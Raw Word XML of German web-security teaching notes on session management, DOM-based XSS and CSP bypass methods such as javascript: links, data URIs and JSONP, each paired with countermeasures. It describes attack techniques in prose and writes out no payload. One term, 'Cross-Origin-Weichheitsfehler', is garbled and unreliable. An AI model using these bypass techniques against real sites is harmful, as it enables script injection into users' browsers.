    <w:p w14:paraId="4D6ABEE5" w14:textId="77777777" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="00CE49B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00796D13">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session Management:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Implementieren Sie effektives Session-Management, einschließlich der Regeneration von Session IDs nach einer erfolgreichen Anmeldung und der regelmäßigen Ablaufzeit von Sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F2C7E0" w14:textId="6C476790" w:rsidR="00CE49B6" w:rsidRDefault="00CE49B6" w:rsidP="00E12A87"/>
    <w:p w14:paraId="7433ECA9" w14:textId="77777777" w:rsidR="00E12A87" w:rsidRPr="00E12A87" w:rsidRDefault="00E12A87" w:rsidP="00E12A87">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E12A87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>XSS DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D494549" w14:textId="2570D1F8" w:rsidR="00E12A87" w:rsidRDefault="00E12A87" w:rsidP="00E12A87">
      <w:r>
        <w:t>DOM-basiertes Cross-Site Scripting (XSS) ist eine spezifische Art von XSS-Angriff, bei dem die Schwachstelle im Document Object Model (DOM) einer Webanwendung liegt, anstatt in den vom Server gesendeten Daten. Im Gegensatz zu traditionellen XSS-Angriffen, bei denen der schädliche Code über den Server an den Client geliefert wird, entsteht DOM-basiertes XSS durch Skripte, die auf der Client-Seite ausgeführt werden und dabei die Struktur oder das Verhalten der Webseite verändern, ohne dass eine neue Seite vom Server angefordert wird.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF3D3A5" w14:textId="77777777" w:rsidR="00E12A87" w:rsidRDefault="00E12A87" w:rsidP="00E12A87"/>
    <w:p w14:paraId="0B0B176B" w14:textId="77777777" w:rsidR="00E12A87" w:rsidRPr="00E12A87" w:rsidRDefault="00E12A87" w:rsidP="00E12A87">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E12A87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Funktionsweise von DOM-basiertem XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D701F83" w14:textId="3D470B2F" w:rsidR="00E12A87" w:rsidRDefault="00E12A87" w:rsidP="00E12A87">
      <w:r>
        <w:t xml:space="preserve">DOM-basiertes XSS tritt auf, wenn eine Webanwendung JavaScript verwendet, um Daten von einer unsicheren Quelle (wie Benutzereingaben) zu nehmen und diese Daten im DOM der Webseite zu manipulieren, ohne die Daten angemessen zu validieren oder zu desinfizieren. Angreifer können diese Schwachstelle ausnutzen, indem sie Benutzer dazu bringen, speziell präparierte URLs zu besuchen oder manipulierte Formulardaten einzureichen, die schädlichen JavaScript-Code enthalten. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1655B208" w14:textId="77777777" w:rsidR="00E12A87" w:rsidRPr="00D27385" w:rsidRDefault="00E12A87" w:rsidP="00E12A87">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Beispiel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B53FD06" w14:textId="1920B1E7" w:rsidR="00E12A87" w:rsidRDefault="00E12A87" w:rsidP="00E12A87">
      <w:r>
        <w:t xml:space="preserve">Eine Webanwendung verwendet JavaScript, um einen Parameter aus der URL zu lesen und diesen direkt im DOM zu reflektieren, zum Beispiel, um eine Begrüßungsnachricht anzuzeigen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325FD2B5" w14:textId="2C3898C5" w:rsidR="00E12A87" w:rsidRDefault="00E12A87" w:rsidP="00E12A87">
      <w:r>
        <w:t>Ein Angreifer könnte eine manipulierte URL erstellen, die schädlichen JavaScript-Code in der Hash-Komponente enthält</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E2FA20" w14:textId="77777777" w:rsidR="00E12A87" w:rsidRDefault="00E12A87" w:rsidP="00E12A87">
      <w:r>
        <w:t>Wenn ein Benutzer diese URL besucht, wird der schädliche Skript-Tag aus der URL gelesen und direkt im DOM ausgeführt, was zu einem Alert-Dialog oder anderen unerwünschten Aktionen führen kann.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA25897" w14:textId="77777777" w:rsidR="00E12A87" w:rsidRPr="00E12A87" w:rsidRDefault="00E12A87" w:rsidP="00E12A87">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E12A87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Gegenmaßnahmen und Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2D9730" w14:textId="77777777" w:rsidR="00E12A87" w:rsidRDefault="00E12A87" w:rsidP="00E12A87">
      <w:r w:rsidRPr="00E12A87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Datenvalidierung und -desinfizierung</w:t>
      </w:r>
      <w:r>
        <w:t>: Alle Eingaben, die im DOM verwendet werden, sollten sorgfältig validiert und desinfiziert werden, um sicherzustellen, dass sie keine schädlichen Skripte enthalten.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0DC982" w14:textId="77777777" w:rsidR="00E12A87" w:rsidRDefault="00E12A87" w:rsidP="00E12A87">
      <w:r w:rsidRPr="00E12A87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verwendung von sicheren JavaScript-Funktionen</w:t>
      </w:r>
      <w:r>
        <w:t>: Verwenden Sie sichere Funktionen zur Manipulation des DOM, die nicht zur Ausführung von HTML oder JavaScript führen, wie textContent anstelle von innerHTML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A536B46" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00E12A87" w:rsidP="00E12A87">
      <w:r w:rsidRPr="00E12A87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content Security Policy (CSP)</w:t>
      </w:r>
      <w:r>
        <w:t>: Implementieren Sie eine Content Security Policy, die das Ausführen von unsicherem JavaScript einschränkt, um die Auswirkungen von XSS-Angriffen zu minimieren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFC513A" w14:textId="374C6F37" w:rsidR="00E12A87" w:rsidRDefault="00E12A87" w:rsidP="00E12A87">
      <w:r w:rsidRPr="00E12A87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Escaping von Benutzereingaben</w:t>
      </w:r>
      <w:r>
        <w:t>: Stellen Sie sicher, dass alle Benutzereingaben, die im DOM reflektiert werden, korrekt escaped sind, insbesondere bei der Arbeit mit URLs, Formulardaten und anderen Eingabequellen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2242EB" w14:textId="5B636A02" w:rsidR="00D27385" w:rsidRPr="00D27385" w:rsidRDefault="00D27385" w:rsidP="00E12A87">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CSP Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C19BCB" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385">
      <w:r>
        <w:t>Eine Content Security Policy (CSP) ist eine Sicherheitsrichtlinie, die Webentwickler verwenden können, um XSS-Angriffe und andere potenziell unsichere Praktiken in ihren Webanwendungen zu verhindern. Ein CSP-Bypass tritt auf, wenn ein Angreifer eine Sicherheitslücke in der Implementierung einer CSP findet und diese ausnutzt, um die Sicherheitsrichtlinie zu umgehen und schädlichen Code in einer Webseite auszuführen. Es gibt verschiedene Methoden, mit denen Angreifer versuchen können, eine CSP zu umgehen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1382C285" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="1A6D20E4" w14:textId="77777777" w:rsidR="00D27385" w:rsidRPr="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Methoden zur Umgehung einer CSP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212D5ED4" w14:textId="7C6A5A22" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385">
      <w:r w:rsidRPr="00D27385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inline-Skripte und Inline-Stile:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Einige CSP-Richtlinien verbieten das direkte Einbetten von JavaScript oder CSS in HTML (Inline-Skripte oder Inline-Stile), um XSS-Angriffe zu verhindern. Ein Angreifer kann versuchen, diese Einschränkungen zu umgehen, indem er alternative Techniken verwendet, wie z.B. das Ausnutzen von Schwachstellen in Bibliotheken oder das Einschleusen von Code über andere erlaubte Mechanismen, wie z.B. das javascript:-Protokoll in einem Link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432FE185" w14:textId="75CE0A34" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385">
      <w:r w:rsidRPr="00D27385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data-URIs</w:t>
      </w:r>
      <w:r>
        <w:t>: Data-URIs ermöglichen es, Daten in URLs einzubetten, einschließlich JavaScript oder CSS. Ein Angreifer kann versuchen, schädlichen Code in einer Data-URI zu verbergen und ihn dann in einer Webseite einzubetten, um die CSP zu umgehen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D09B993" w14:textId="56AAE989" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385">
      <w:r w:rsidRPr="00D27385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dynamisches Skript-Einfügen</w:t>
      </w:r>
      <w:r>
        <w:t>: Wenn eine CSP das Einfügen von Skripten aus externen Quellen verbietet, kann ein Angreifer versuchen, dynamisch Skripte einzufügen, indem er vorhandene Elemente wie &lt;img&gt; oder &lt;iframe&gt; manipuliert, um schädlichen Code von externen Quellen zu laden und auszuführen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535C9158" w14:textId="13FC71EA" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385">
      <w:r w:rsidRPr="00D27385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JSONP (JSON with Padding)</w:t>
      </w:r>
      <w:r>
        <w:t>: JSONP wird verwendet, um JSON-Daten von einer anderen Domain zu laden, indem ein &lt;script&gt;-Tag mit einer dynamisch generierten URL eingefügt wird. Ein Angreifer kann versuchen, JSONP zu verwenden, um schädlichen Code von einer vertrauenswürdigen Domain zu laden und auszuführen, um die CSP zu umgehen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2140BF21" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385">
      <w:r w:rsidRPr="00D27385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Browser-Schwachstellen:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ein Angreifer kann versuchen, Sicherheitslücken in bestimmten Browsern auszunutzen, um eine CSP zu umgehen. Dies kann beispielsweise durch das Ausnutzen von Cross-Origin-Weichheitsfehlern (Cross-Origin-Read-Policy) oder anderen Sicherheitsmechanismen erfolgen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF10684" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="7893D243" w14:textId="21D8C4A3" w:rsidR="00D27385" w:rsidRPr="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Gegenmaßnahmen gegen</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> einen</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSP-Bypass:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F64C26" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385">
      <w:r w:rsidRPr="00D27385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Strenge Richtlinien</w:t>
      </w:r>
      <w:r>
        <w:t>: Verwenden Sie möglichst strenge CSP-Richtlinien, die das Einbetten von Inline-Skripten und Inline-Stilen verbieten und nur das Laden von Skripten aus vertrauenswürdigen Quellen erlauben.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D438BA" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385">
      <w:r w:rsidRPr="00D27385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Regelmäßige Überprüfung</w:t>
      </w:r>
      <w:r>
        <w:t>: Überprüfen Sie regelmäßig Ihre CSP-Richtlinien auf Schwachstellen und aktualisieren Sie sie entsprechend, um potenzielle Angriffsvektoren zu minimieren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60911920" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385">
      <w:r w:rsidRPr="00D27385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Verwendung von Nonces und Hashes</w:t>
      </w:r>
      <w:r>
        <w:t>: Verwenden Sie Nonces (eindeutige zufällige Zeichenfolgen) oder Hashes für Inline-Skripte und Inline-Stile, um sicherzustellen, dass nur genehmigte Skripte und Stile ausgeführt werden können.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397DCD7F" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385">
      <w:r w:rsidRPr="00D27385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sicherer Skripttransport</w:t>
      </w:r>
      <w:r>
        <w:t>: Verwenden Sie HTTPS, um sicherzustellen, dass Skripte sicher übertragen werden und nicht abgefangen oder manipuliert werden können.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2269EB7C" w14:textId="2A41580E" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385">
      <w:r w:rsidRPr="00D27385">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Browser-Integration</w:t>
      </w:r>
      <w:r>
        <w:t>: Aktivieren Sie browserseitige Sicherheitsfunktionen wie Subresource Integrity (SRI), um sicherzustellen, dass Ressourcen aus externen Quellen nicht manipuliert wurden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79460631" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="5C063961" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="68CB7979" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="59072E47" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="73E32A62" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="19A37CCF" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="52490F9A" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="08BED1BB" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="309CA5E8" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="74FD13D5" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="02E0BD97" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="63D7F4E8" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="721BC285" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="2D428A22" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="390194D8" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="09FDECE0" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="3B4A0CE7" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="34DD7675" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="028A0ED6" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="7C0148A3" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="0AB99A74" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="47ACC6C4" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="4ABF590A" w14:textId="77777777" w:rsidR="00D27385" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:p w14:paraId="6FC763BC" w14:textId="77777777" w:rsidR="00D27385" w:rsidRPr="00CE49B6" w:rsidRDefault="00D27385" w:rsidP="00D27385"/>
    <w:sectPr w:rsidR="00D27385" w:rsidRPr="00CE4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32E55"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DDD26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7296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94F"/>
    <w:rsid w:val="00013E60"/>
    <w:rsid w:val="00071616"/>
    <w:rsid w:val="000C654B"/>
    <w:rsid w:val="000E7EC8"/>
    <w:rsid w:val="000F55C8"/>
    <w:rsid w:val="0021754F"/>
    <w:rsid w:val="002D65A0"/>
    <w:rsid w:val="002E5233"/>
    <w:rsid w:val="002F2606"/>
    <w:rsid w:val="0034694F"/>
    <w:rsid w:val="00346A55"/>
    <w:rsid w:val="003471E3"/>
    <w:rsid w:val="003830AD"/>
    <w:rsid w:val="003A5863"/>
    <w:rsid w:val="0043325D"/>
    <w:rsid w:val="00497AE7"/>
    <w:rsid w:val="004C71FB"/>
    <w:rsid w:val="006D35EA"/>
    <w:rsid w:val="006E2B33"/>
    <w:rsid w:val="006F7411"/>
    <w:rsid w:val="00796D13"/>
    <w:rsid w:val="007A0557"/>
    <w:rsid w:val="007E678D"/>
    <w:rsid w:val="0085241E"/>
    <w:rsid w:val="009804F2"/>
    <w:rsid w:val="009F0EF0"/>
    <w:rsid w:val="00A52131"/>
    <w:rsid w:val="00A73D01"/>
    <w:rsid w:val="00A85D2B"/>
    <w:rsid w:val="00AA2D57"/>
    <w:rsid w:val="00AD08C3"/>
    <w:rsid w:val="00B26CA8"/>
    <w:rsid w:val="00B91D89"/>
    <w:rsid w:val="00B95682"/>
    <w:rsid w:val="00BD0059"/>
    <w:rsid w:val="00C878EC"/>
    <w:rsid w:val="00CE2A7C"/>
    <w:rsid w:val="00CE49B6"/>
    <w:rsid w:val="00D272DA"/>
    <w:rsid w:val="00D27385"/>
    <w:rsid w:val="00DA1E23"/>
    <w:rsid w:val="00DA7205"/>
    <w:rsid w:val="00E12A87"/>
    <w:rsid w:val="00E46236"/>
    <w:rsid w:val="00E522E4"/>
    <w:rsid w:val="00F57382"/>
    <w:rsid w:val="00FD46FD"/>
    <w:rsid w:val="00FF3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D1796"/>
  <w15:docId w15:val="{CCE3CFB7-3C3C-4915-A1E9-06CD8F55A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AT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003469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69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69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69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69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69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69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69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69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94F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
      <w:lang w:val="de-AT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0034694F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="de-AT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0034694F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="de-AT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0034694F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:lang w:val="de-AT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0034694F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:lang w:val="de-AT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0034694F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:lang w:val="de-AT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0034694F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:lang w:val="de-AT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0034694F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:lang w:val="de-AT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0034694F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:lang w:val="de-AT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="003469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694F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
      <w:lang w:val="de-AT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="003469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694F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="de-AT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="0034694F"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
